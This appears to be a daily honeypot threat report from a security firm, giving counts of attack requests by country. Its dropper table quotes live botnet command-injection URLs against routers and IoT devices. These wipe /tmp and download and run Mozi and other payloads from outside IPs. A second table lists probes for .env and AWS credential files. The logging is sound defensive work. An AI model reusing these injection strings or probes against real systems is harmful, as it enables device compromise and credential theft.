Report: 2025-05-03

Author
Shoggoth Industries
Daily Report: 2025-05-03

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 27 new requests that have never been observed before (these were added to the monitored request database).

A total of 1388 requests were recorded during the day, originating from 5 different countries, with a peak of 274 requests coming from NL.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading or interactions with the website). For more information, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Dubai |
| US | Israel |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 79.116.34.227 | GET /shell?cd+/tmp;rm+-rf+*;wget+176.65.148.180/jaws;sh+/tmp/jaws HTTP/1.1 |
| 122.97.214.128 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://102.97.172.58:47010/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
| 122.97.137.166 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.97.194.141:32859/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 45.95.147.209 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1 |
| 185.218.84.39 | GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\x5C/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1 |

request

The requests listed here are those that have not yet been integrated into the request database.

| | number_of_occurence | request |
|---|---|---|
| 68 | 4 | GET /developmentserver/metadatauploader HTTP/1.1 |
| 194 | 1 | GET /system.ini?loginuse=LOGIN&?loginpas=PASS HTTP/1.1 |
| 207 | 1 | GET /cron/aws_ses.env HTTP/1.1 |
| 214 | 1 | GET /secrets/aws_ses.env HTTP/1.1 |
| 221 | 1 | GET /cli/aws_ses.env HTTP/1.1 |
| 230 | 1 | GET /aws-sns/.env HTTP/1.1 |
| 231 | 1 | GET /var/lib/aws/sns.env HTTP/1.1 |
| 232 | 1 | GET /var/aws/ses.env HTTP/1.1 |
| 244 | 1 | GET /aws-ses/.env HTTP/1.1 |
| 246 | 1 | GET /cli/aws_sns.env HTTP/1.1 |
| 247 | 1 | GET /.sendgrind.env HTTP/1.1 |
| 248 | 1 | GET /var/lib/aws/ses.env HTTP/1.1 |
| 259 | 1 | GET /src/tests/fixtures/typeScriptVisualizeProject/.env HTTP/1.1 |
| 262 | 1 | GET /secret/aws_ses.env HTTP/1.1 |
| 267 | 1 | GET /storage/aws_ses.env HTTP/1.1 |
| 271 | 1 | GET /opt/aws/ses.env HTTP/1.1 |
| 276 | 1 | GET /var/www/aws-sns.env HTTP/1.1 |
| 281 | 1 | GET /data/aws/ses.env HTTP/1.1 |
| 282 | 1 | GET /src/tests/fixtures/typeScriptProject/.env HTTP/1.1 |
| 309 | 1 | GET /var/aws/sns.env HTTP/1.1 |
| 310 | 1 | GET /storage/aws_sns.env HTTP/1.1 |
| 314 | 1 | GET /secret/aws_sns.env HTTP/1.1 |
| 319 | 1 | GET /opt/aws/sns.env HTTP/1.1 |
| 323 | 1 | GET /src/tests/fixtures/instanceWithDependentSteps/.env HTTP/1.1 |
| 330 | 1 | GET /secrets/aws_sns.env HTTP/1.1 |
| 344 | 1 | GET /cron/aws_sns.env HTTP/1.1 |
| 350 | 1 | GET /data/aws/sns.env HTTP/1.1 |

country_iso_code

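| | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 274 | NL |
| 1 | 239 | US |
| 2 | 219 | GB |
| 3 | 166 | BG |
| 4 | 70 | SC |
| 5 | 62 | CH |
| 6 | 56 | CN |
| 7 | 47 | VN |
| 8 | 39 | PL |
| 9 | 32 | HK |
| 10 | 29 | DE |
| 11 | 28 | IN |
| 12 | 16 | KR |
| 13 | 12 | CA |
| 14 | 11 | AZ |
| 15 | 10 | SG |
| 16 | 10 | UA |
| 17 | 8 | CZ |
| 18 | 7 | UZ |
| 19 | 6 | HR |
| 20 | 4 | GH |
| 21 | 4 | AO |
| 22 | 4 | EE |
| 23 | 4 | JP |
| 24 | 3 | BE |
| 25 | 3 | PT |
| 26 | 3 | FR |
| 27 | 2 | DO |
| 28 | 2 | PE |
| 29 | 2 | KW |
| 30 | 2 | TR |
| 31 | 2 | ES |
| 32 | 2 | IT |
| 33 | 1 | LT |
| 34 | 1 | HU |
| 35 | 1 | AU |
| 36 | 1 | DK |
| 37 | 1 | ID |
| 38 | 1 | MC |
| 39 | 1 | BR |
| 40 | 1 | RU |
| 41 | 1 | AR |
| 42 | 1 | SE |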
